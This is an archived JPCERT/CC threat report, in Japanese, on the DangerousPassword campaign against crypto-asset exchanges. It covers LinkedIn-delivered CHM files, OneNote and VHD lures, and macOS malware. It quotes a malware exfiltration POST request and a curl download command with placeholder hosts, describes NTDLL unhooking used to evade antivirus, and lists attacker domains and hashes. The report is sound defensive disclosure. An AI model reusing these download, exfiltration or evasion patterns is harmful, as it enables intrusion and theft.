攻撃キャンペーンDangerousPasswordに関連する攻撃動向 - JPCERT/CC Eyes By 朝長 秀誠 (Shusei Tomonaga) Published: 2023-04-30 · Archived: 2026-04-05 16:59:00 UTC JPCERT/CCは、2019年6月から継続して攻撃キャンペーンDangerousPassword(CryptoMimicまたは、 SnatchCryptoとも呼ばれる)に関連すると考えられる暗号資産交換事業者への攻撃を確認しています。 攻撃者は、ショートカットファイルをメールでターゲットに送信して、マルウェアに感染させようと する攻撃手法を長年続けているのですが、その他にもいろんなパターンの攻撃を行いながらマルウェ ア感染を狙っていることがわかっています。今回は、最近確認されたDangerousPasswordの攻撃手法に ついて紹介します。 今回、紹介する攻撃パターンは以下の4つです。 Linkedinから不正なCHMファイルを送りつけてくる攻撃 OneNoteファイルを利用した攻撃 仮想ハードディスク(Virtual Hard Disk)ファイルを利用した攻撃 macOSを狙った攻撃 LinkedInから不正なCHMファイルを送りつけてくる攻撃 攻撃者は、メールの添付ファイルでマルウェアを送信してくる以外にも、LinkedInでターゲットにコン タクトしてきて、マルウェアを送りつけてくる場合もあります。図1は、LinkedIn経由で送られてきた マルウェアがホスト上に感染するまでの流れです。 図1:マルウェア感染の流れ LinkedIn経由で送られてきたファイルはRAR形式で圧縮されており、展開するとWindowsヘルプファイ ル(CHMファイル)が含まれています。このファイルを実行すると、外部からWindows インストーラ ー ファイル(MSIファイル)をダウンロードして実行します。実行されたMSIファイルは、PowerShell https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html Page 1 of 13 スクリプトを使用して外部から追加のMSIファイルをダウンロードして実行します(図1の Administrator-a214051.msi、なおファイル名は [実行したユーザー名]-a[ランダムな数字5桁]1.msi とな る)。このMSIファイルは、感染ホストの情報を送信する機能を持っており、以下のようにHTTP POSTリクエストで情報を送信します。送信する感染ホストの情報は、Base64エンコードされていま す。 POST /test.msi HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Accept-Language: ja-JP User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 8708 Host: [サーバー名] VGltZToJV2VkIERl(...) 図2は、マルウェアが感染ホストの情報を収集するコードの一部です。JScriptで作成されていることが わかります。 https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html Page 2 of 13 図2:マルウェアのコードの一部 なお、ターゲットに対してコンタクトしてくるLinkedInアカウントは、求人情報を連絡するように装っ て、ターゲットに対してマルウェアを送りつけてくることを確認しています。図3はターゲットに対し てコンタクトしてきたLinkedInアカウントですが、これらのアカウントも攻撃者によって乗っ取られて いると考えられます。現在のところ、攻撃者がSNSアカウントを乗っ取る方法については不明です。 https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html Page 3 of 13 図3:攻撃者に悪用されたLinkedInアカウント例 OneNoteファイルを利用した攻撃 OneNoteファイルを悪用してマルウェアに感染させようとする手法は、Emotetなどでも確認されてお り、メールの添付ファイルから感染を広げるタイプの攻撃では定番になりつつあります。 DangerousPasswordも、同様の攻撃手法を利用しており、図4のようなマルウェアの埋め込まれた OneNoteファイルを送付し、OneNoteファイルを表示した際に表示されるアイコン(図4のPDFファイル に見せかけたアイコン)をクリックさせることで、マルウェア感染させようとします。 https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html Page 4 of 13 図4:OneNoteファイルの例 OneNoteファイルに埋め込まれたマルウェアはMSIファイルで、DLLファイルをホスト上に保存して、 実行します。DLLファイルは、以下のcurlコマンドを使用してマルウェアをダウンロードします。 curl -A cur1-agent -L [URL] -x [Proxy] -s -d dl また、このマルウェアは図5のようにウイルス対策ソフトを検知する機能を持っています。 https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html Page 5 of 13 図5:ウイルス対策ソフトを検知するコードの一部 以下のウイルス対策ソフトを検知した場合、NTDLLへのフック処理を解除して、ウイルス対策ソフト の監視を逃れようとしたり[1]、curlコマンド実行時に送信するデータ( dl または da )が変更された り、ダウンロードしたマルウェアを実行する方法を変更(Explorerへのインジェクションまたは、 Rundll32を使って起動)したり、ホスト上での挙動を変更します。 Avast Avira Bitdefender Kaspersky Sophos Trend Micro Windows Defender 仮想ハードディスク(Virtual Hard Disk)ファイルを利用した攻撃 https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html Page 6 of 13 攻撃者は、マルウェアをZIPやRAR形式で圧縮したり、ISOファイルに含める以外にも、仮想ハードデ ィスクファイル(VHDファイル)に含めている場合もあります。VHDファイルは、仮想化技術である Hyper-Vにてハードディスクを使用するためにファイルとして保存する形式であり、Windows OS上では ダブルクリックでマウントすることが可能です。図6は、マルウェアが含まれたVHDファイルをマウン トした様子です。中には、デコイのPDFファイルとメインのマルウェア(DLLファイル)およびDLLフ ァイルを起動するための実行ファイル(EXEファイル)が含まれています。 図6:VHDファイルをマウントした例 DLLファイルは、前節で説明したOneNoteファイルに含まれていたマルウェアと同様の機能を持ったマ ルウェアです。 macOSを狙った攻撃 攻撃者は、Windows OSだけではなくmacOSもターゲットにしていることを確認しています。図7は、 macOSをターゲットにしたマルウェアのファイル構成です。 https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html Page 7 of 13 図7:マルウェアのファイル構成 図8のように、 main.scpt 内に不正なアプリケーションをcurlコマンドを使ってダウンロードし、実行 するAppleScriptが含まれています。 図8: 不正なAppleScriptの内容 ダウンロードされるアプリケーションを実行すると、図9のような画面が起動します。読み込ませるフ ァイルの内容をXORデコードして、デコードされた通信先からファイルをダウンロードして、実行す る機能(図10)を持っています。 https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html Page 8 of 13 図9:ダウンロードされたマルウェア実行時に表示される画面 図10:ファイルをダウンロードするコードの一部 なお、本マルウェアの詳細についてはjamfのブログ[2]でも公開されているため、そちらもご参照くだ さい。 おわりに 標的型攻撃グループDangerousPasswordは、国内の暗号資産交換事業者に対して、引き続き攻撃を行っ ています。この攻撃グループは、LinkedInからターゲットに対してコンタクトしてくることもあるの https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html Page 9 of 13 で、SNSの使用時には注意が必要です。また、macOSもターゲットになる可能性もあるため、macOSを 使用している場合も警戒しておくことが重要です。今回紹介したマルウェアの通信先などについて は、Appendixに記載していますのでご確認ください。 インシデントレスポンスグループ 朝長 秀誠 参考情報 [1] Red Team Notes: Full DLL Unhooking with C++   https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++ [2] jamf: BlueNoroff APT group targets macOS with ‘RustBucket’ Malware   https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/ Appendix A: 通信先 www.thecloudnet.org azure.protection-service.cloud verify.azure-protect.online docs.azure-protection.cloud secure.azure-protection.cloud web.j-ic.co cloud.dnx.capital 104.200.137.32 one.microshare.cloud www.capmarketreport.com safe.doc-share.cloud openaibt.com cloud.espcapital.pro autoprotect.com.de Appendix B: マルウェアのハッシュ値 bdd109cba8346548dd6fe5110180aa23eb9f5805c90733025344a5881c15c985 4867215129fead94a52e4b62ef6851b3170a0a8b66a87eadfc919f84257d25b8 f0b6d6981e06c7be2e45650e5f6d39570c1ee640ccb157ddfe42ee23ad4d1cdb 31908e42d8cb30f5bda71516de7c5c6a329c7dddcae77e19f64379d351177b90 782f24a4b8fa692489ddfdac5eb989f5852bbe0da05c2e27190047f77282b936 fc07a2468fafc762e106dd33fd0734a05118eb96d66fcc7ed358669e888d53ca 248867e775fda3c6c03c1daeb0e10d2ce5956cb1c164bbd980ff98fe2f97e38c 5816eb32cbaadfc3477c823293a8c49cdf690b443c8fa3c19f98399c143df2b3 5f4f006bfb9136c304e0aabf75575360120d022567180ce6b9c1835e209c541e 4fb31b9f5432fd09f1fa51a35e8de98fca6081d542827b855db4563be2e50e58 f14c5bad5219b1ed5166eb02f5ff08a890a181cef2af565f3fe7bcea9c870e22 https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html Page 10 of 13 826f2a2a25f7b7d42f54d18a99f6721f855ba903db7b125d7dea63d0e4e6df64 d6c3d0d2dedfa37cd1bebded60f303b21da860dcac49cfaa06e3172f0b1138ce f14c5bad5219b1ed5166eb02f5ff08a890a181cef2af565f3fe7bcea9c870e22 48bd1c5cf9ccc3d454ab80d7284abaf39028a228607d132bfa92ab2ceca47ca2 f0cf1829a93751d2f7e812545af079a4efebd755f1ee50a8d4537770f692eaaf 9472f5ecac1672186bc1275cc70f024c734d0e6926917ce22b2cb6b1765ce83e ab31b0cb796b3ae001fb4d12d9cac8c98911e11322cb974bf8d2be9303259a5e f14c5bad5219b1ed5166eb02f5ff08a890a181cef2af565f3fe7bcea9c870e22 5ad84c75b4a8825a4ee49fcb2ab895f0a51c9877fc4e50595fa1917ae1daa748 8a7ba38d597e8230609df4153039d1bb898479d486e653a6d92d206dd4848c80 ba186a1a97d4f647dad39cb3ccae5466bb8d5463ceedf470428484416265ef5f 7e2b38decf1f826fbb792d762d9e6a29147e9ecb44eb2ad2c4dc08e7ee01a140 c56a97efd6d3470e14193ac9e194fa46d495e3dddc918219cca530b90f01d11e 9525f5081a5a7ab7d35cf2fb2d7524e0777e37fe3df62730e1e7de50506850f7 7981ebf35b5eff8be2f3849c8f3085b9cec10d9759ff4d3afd46990520de0407 38106b043ede31a66596299f17254d3f23cbe1f983674bf9ead5006e0f0bf880 741be5e53a5dc7cebaa63d6ff624c5eff1a0e1817ede1e7fc0473a28b1ed7a33 a131edf272f1df1c841a9c457a50011325b1e22e950d62c5e78d3060450e6b93 b63bca8d35653ce17b99b89f00fbee9b5cb6a70420b7dd0c3194038b9031e3e2 9f7a7717884519763f043c39c1cb2a9605da123c18b72e5bedcd5d587a54a0e8 a3f087c83453cde2bc845122c05ebeb60e8891e395b45823c192869ec1b72ea6 3a4aed5b9ad0827696a1bb5f3497a6a2aa26b453d27bfacbe3c8c47673aac98d 02acbedc105104541e67eec1ef845c7d68d624faa56e81713e3216ca66a7f3c7 1bc742f1aebbc12220cd6bf761509fd3a7aae2d5de88dce8d45fb5cf79ad8ccb a2fd03354c2ec433d2eedc28e85c0fe5841b848d5fff1e6583e2d9e1a81b6ca3 049bfff97fbb2c5e53eeed6df36d2c93c7cca199d42c0247c784b39db90f173b 26e376fc80b090b2ee04e7d3104d308a150e58538580109a74f4ac49bf362423 60701bdae4b33de7c53e4a0708b7187f313730bd09c4c553847134f268160a73 a064e62cb168affa9dac8a4374b582bfa289e182f8a5e0b731c4ea9408d99ae3 a1a30091cf25740468cd1894d39fce07039f89f05eee90cf72aa085698eeeff6 d18cda8fc17f0c412b209dda24784cbe666fe79a708c9965cd18eef85439adb2 7935839ab987a47b9bacc2daf12e7af590259abcfdd473c81a7e540e58ed5760 eee5ee98f57ab2b30a3bf04b8fa9d7b90455ddf2d39c8c4e04958b77d9170411 d0072130eb4ee81ffba5b703a16c276b0c59b408cb8aa3915980f0f098f04984 朝長 秀誠 (Shusei Tomonaga) https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html Page 11 of 13 外資系ITベンダーでのセキュリティ監視・分析業務を経て、2012年12月から現職。現在は、マルウェ ア分析・フォレンジック調査に従事。主に、標的型攻撃に関するインシデント分析を行っている。 CODE BLUE、BsidesLV、BlackHat USA Arsenal、Botconf、PacSec、FIRSTなどで講演。JSACオーガナ イザー。 関連記事 JSAC2026 開催レポート~DAY 2~ 攻撃グループAPT-C-60による攻撃のアップデート https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html Page 12 of 13 Cobalt Strike Beaconの機能をクロスプラットフォームへと拡張するツール「CrossC2」を使った攻 撃 Ivanti Connect Secureの脆弱性を起点とした侵害で確認されたマルウェア Ivanti Connect Secureに設置されたマルウェアDslogdRAT Source: https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html Page 13 of 13